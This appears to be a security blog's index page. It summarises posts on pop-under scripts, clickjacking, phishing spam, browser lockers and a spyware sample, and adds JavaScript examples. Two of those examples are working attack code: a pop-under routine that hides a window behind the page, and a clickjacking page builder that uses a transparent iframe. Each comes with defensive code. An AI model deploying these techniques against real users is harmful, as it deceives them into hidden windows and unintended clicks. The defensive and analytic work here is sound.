Pop-under JavaScript

Pop-unders are a special case of pop-up page: the new window is opened and then pushed behind the active browser window, usually without the user noticing. They are commonly found on questionable websites and are used to push advertisements. With Coinhive mining scripts growing in popularity, a script that keeps running in an open window without the user's knowledge can silently consume the user's CPU, or run any other code the operator chooses, for as long as the window stays open. This post discusses my process for reverse engineering and re-creating a commercial (if you can call paid pseudo-malware commercial) pop-under script, and some mitigation techniques. As of the time of writing, this script is widely used and bypasses all of Chrome's pop-under protections.
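The following is an added example, not the commercial script analysed in the post. It shows the classic pop-under sequence (open the window inside a click handler so the browser's user-gesture check passes, then blur it and refocus the opener) and one simple in-page guard against that sequence. To run under Node it uses a constructed stand-in for the browser's window object; the guard is a heuristic of my own and makes no claim to stop the bypass the post describes.

```javascript
// Minimal stand-in for `window` that records focus/blur/open/close calls.
// Constructed for this example; a real browser supplies these methods itself.
function makeFakeWindow(name) {
  return {
    name,
    log: [],        // chronological record of what was called on this window
    opened: [],     // child windows created by open()
    closed: false,
    focus() { this.log.push(`${this.name}.focus`); },
    blur()  { this.log.push(`${this.name}.blur`); },
    close() { this.closed = true; this.log.push(`${this.name}.close`); },
    open(url) {
      const child = makeFakeWindow(`popup(${url})`);
      child.opener = this;
      this.opened.push(child);
      this.log.push(`${this.name}.open(${url})`);
      return child;
    },
  };
}

// The classic pop-under. Call this from a click handler: the open() passes the
// popup blocker because it follows a user gesture, and the blur()/focus() pair
// immediately sends the new window behind the page the user is looking at.
function popUnder(win, url) {
  const ad = win.open(url, '_blank');
  if (!ad) return null;            // popup blocker refused the open
  ad.blur();
  win.focus();
  return ad;
}

// A simple mitigation (my own heuristic, not from the post): wrap window.open so
// that a child window the page tries to blur, or a refocus of the opener right
// after opening a child, closes the child instead of hiding it.
function installPopUnderGuard(win) {
  const realOpen = win.open.bind(win);
  const realFocus = win.focus.bind(win);
  let lastChild = null;
  win.open = function (...args) {
    const child = realOpen(...args);
    if (!child) return child;
    lastChild = child;
    // Honest pages have little reason to blur a window they just opened.
    child.blur = function () {
      this.close();
      win.log.push('guard: closed blurred popup');
    };
    return child;
  };
  win.focus = function () {
    if (lastChild && !lastChild.closed) {
      lastChild.close();
      win.log.push('guard: closed popup on opener refocus');
    }
    realFocus();
  };
}
```

In a real page the guard would be installed by a user script or extension before the site's own JavaScript runs; once the site has captured the original `window.open` the wrapper is bypassed, which is one reason extension-level blocking is preferable to in-page code.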


Clickjacking Facebook Likes

This post highlights a common clickjacking application: stealing Facebook likes. The JavaScript and CSS used for the attack are extremely simple: the target page is loaded in a transparent iframe positioned over a decoy, so a click meant for the decoy lands on the framed button. Applying this technique to a Facebook "Like" button is relatively harmless and has been rendered somewhat obsolete by a confirmation dialog from Facebook. However, the same technique works against any state-changing button on a page that allows itself to be framed, and can be used for much more malicious purposes.
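As an added example (not the post's own code), the overlay an attacker builds and a checker for the server-side defence: a function that evaluates whether a page served with a given set of response headers could be framed from a given origin, following the precedence browsers apply (a CSP frame-ancestors directive overrides X-Frame-Options; DENY and SAMEORIGIN are honoured; the obsolete ALLOW-FROM is ignored; with neither header anyone may frame the page). The hostnames are placeholders and the CSP source matching covers the common forms only.

```javascript
// Builds the attacker's page. The target is loaded in an iframe that is fully
// transparent and stacked above a decoy button, so the victim's click on the
// decoy actually lands on the framed page's own button.
function buildClickjackPage(targetUrl, decoyText) {
  return `<!doctype html>
<style>
  #decoy  { position:absolute; top:120px; left:80px; z-index:1; font-size:20px; }
  #target { position:absolute; top:100px; left:60px; width:400px; height:200px;
            z-index:2; opacity:0; border:0; }   /* invisible, but on top */
</style>
<button id="decoy">${decoyText}</button>
<iframe id="target" src="${targetUrl}" scrolling="no"></iframe>`;
}

// Does one CSP frame-ancestors source (already lower-cased, quotes stripped)
// match the framing origin? Handles 'self', '*', scheme-sources such as
// "https:", exact hosts and "*.example.com" wildcards (subdomains only).
function sourceMatches(src, framer, page) {
  if (src === 'self') return framer.origin === page.origin;
  if (src === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framer.protocol === src;
  const [scheme, hostPart] = src.includes('://') ? src.split('://') : [null, src];
  if (scheme && framer.protocol !== scheme + ':') return false;
  const host = hostPart.split('/')[0].split(':')[0];   // drop path and port
  if (host.startsWith('*.')) return framer.hostname.endsWith(host.slice(1));
  return framer.hostname === host;
}

// Returns true if a browser would allow a page on `framerOrigin` to embed the
// page at `pageOrigin` served with `headers` (a plain object, any case).
function isFramable(headers, framerOrigin, pageOrigin) {
  const framer = new URL(framerOrigin);
  const page = new URL(pageOrigin);
  const get = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key ? String(headers[key]) : null;
  };

  const csp = get('content-security-policy');
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return false;
      return sources.some((s) => sourceMatches(s, framer, page));
    }
  }

  const xfo = get('x-frame-options');
  if (xfo) {
    const value = xfo.trim().toUpperCase();
    if (value === 'DENY') return false;
    if (value === 'SAMEORIGIN') return framer.origin === page.origin;
    // ALLOW-FROM and unknown values: modern browsers ignore them.
  }
  return true;   // no policy at all: the page can be framed by anyone
}
```

Running `isFramable` against the headers of a real login or "like" endpoint is a quick first check during an assessment; a page that comes back `true` for an arbitrary third-party origin is a clickjacking candidate regardless of what the page's JavaScript does.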


Email Spam Malware

Analysis of an ongoing campaign consisting of fake Facebook, Gmail and PayPal notification emails. The emails follow a similar template and always link to a PHP page containing a simple redirect script that sends the user on to a malicious page. In a previous post I covered a browser locker served by this campaign; recently the emails have been linking to a fake Flash update site instead. I briefly analyzed the email, the associated URLs, and the malicious sample obtained.


Browser Locker - Email Spam

Analysis of a spam campaign involving a fraudulent Facebook password reset request. Following the link in the email lands the user on a browser-locking page. A user who is not familiar with this type of malicious page may fall victim to a typical tech support scam. The malicious pages in this campaign are not sophisticated. If the user has not clicked anywhere on the page, they can simply navigate away, because the page cannot enter full-screen mode without a user gesture. Once they have clicked, the page goes full screen, and keyboard shortcuts are needed to open a task manager and terminate the browser process.


Spyware - Quick Malware Analysis

A quick static analysis of a RAT/spyware sample. The sample contains nasty functionality including keyboard/mouse logging, webcam capture and network traffic monitoring. The sample was not executed. Basic dynamic analysis indicated that the malware would require a genuine internet connection, and my current lab environment is designed to use an isolated network served by INetSim. It may be necessary to execute this malware to determine its network-based indicators more easily. As discussed in the post, there are many indications that the malware communicates with an external IP address, but the address(es) or URL(s) appear to be decrypted only at runtime.


Get honeypotted? I like spam. Contact: ar.hp@outlook.com